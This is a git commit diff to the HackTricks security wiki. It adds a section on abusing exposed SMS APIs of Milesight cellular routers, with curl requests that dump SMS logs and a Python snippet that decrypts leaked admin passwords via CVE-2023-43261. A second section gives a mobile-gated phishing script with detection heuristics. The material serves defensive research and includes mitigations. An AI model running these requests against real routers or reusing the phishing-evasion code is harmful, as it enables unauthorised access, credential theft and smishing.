mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs
This commit is contained in:
parent
cd60902021
commit
c8a99a2b35
@ -247,6 +247,73 @@ Mitigations:
|
||||
- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
|
||||
|
||||
---
|
||||
|
||||
## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
|
||||
|
||||
Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
|
||||
|
||||
Typical unauthenticated requests (same structure for inbox/outbox):
|
||||
|
||||
```http
|
||||
POST /cgi HTTP/1.1
|
||||
Host: <router>
|
||||
Content-Type: application/json
|
||||
|
||||
{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
|
||||
```
|
||||
|
||||
```json
|
||||
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
|
||||
```
|
||||
|
||||
Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting.
|
||||
|
||||
Example curl to exfiltrate SMS metadata:
|
||||
|
||||
```bash
|
||||
curl -sk -X POST http://<router>/cgi \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
|
||||
```
|
||||
|
||||
Notes on auth artifacts:
|
||||
- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing.
|
||||
- In environments requiring auth, previously-leaked credentials (see below) restore access.
|
||||
|
||||
Credential recovery path – CVE-2023-43261:
|
||||
- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
|
||||
- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript.
|
||||
- Practical access and decrypt:
|
||||
|
||||
```bash
|
||||
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
|
||||
# Look for entries like: {"username":"admin","password":"<base64>"}
|
||||
```
|
||||
|
||||
Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
|
||||
|
||||
```python
|
||||
import base64
|
||||
from Crypto.Cipher import AES
|
||||
from Crypto.Util.Padding import unpad
|
||||
KEY=b'1111111111111111'; IV=b'2222222222222222'
|
||||
enc_b64='...' # value from httpd.log
|
||||
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
|
||||
```
|
||||
|
||||
Hunting and detection ideas (network):
|
||||
- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`.
|
||||
- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing).
|
||||
- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.
|
||||
|
||||
Shodan/OSINT pivots (examples seen in the wild):
|
||||
- `http.html:"rt_title"` matches Milesight router panels.
|
||||
- Google dorking for exposed logs: `"/lang/log/system" ext:log`.
|
||||
|
||||
Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.
|
||||
|
||||
---
|
||||
|
||||
## Detection Ideas
|
||||
1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
|
||||
2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
|
||||
@ -263,5 +330,8 @@ Mitigations:
|
||||
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
|
||||
- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
|
||||
- 3GPP TS 33.501 – Security architecture and procedures for 5G System
|
||||
- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
|
||||
- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
|
||||
- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -579,6 +579,37 @@ clipboard-hijacking.md
|
||||
mobile-phishing-malicious-apps.md
|
||||
{{#endref}}
|
||||
|
||||
### Mobile‑gated phishing to evade crawlers/sandboxes
|
||||
Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow.
|
||||
|
||||
Minimal client snippet (typical logic):
|
||||
|
||||
```html
|
||||
<script src="/static/detect_device.js"></script>
|
||||
```
|
||||
|
||||
`detect_device.js` logic (simplified):
|
||||
|
||||
```javascript
|
||||
const isMobile = ('ontouchstart' in document.documentElement);
|
||||
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
|
||||
.then(()=>location.reload());
|
||||
```
|
||||
|
||||
Server behaviour often observed:
|
||||
- Sets a session cookie during the first load.
|
||||
- Accepts `POST /detect {"is_mobile":true|false}`.
|
||||
- Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`.
|
||||
|
||||
Hunting and detection heuristics:
|
||||
- urlscan query: `filename:"detect_device.js" AND page.status:500`
|
||||
- Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS.
|
||||
- Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks.
|
||||
|
||||
Defence tips:
|
||||
- Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content.
|
||||
- Alert on suspicious 500 responses following `POST /detect` on newly registered domains.
|
||||
|
||||
## References
|
||||
|
||||
- [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
|
||||
@ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md
|
||||
- [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
|
||||
- [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
|
||||
- [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
|
||||
- [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
|
||||
|
||||
> [!TIP]
|
||||
>
|
||||
> - **How can I cite a page of HackTricks?**
|
||||
> - **How can I a page of HackTricks?**
|
||||
|
||||
As long as the link **of** the page(s) where you took the information from appears it's enough.\
|
||||
If you need a bibtex you can use something like:
|
||||
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user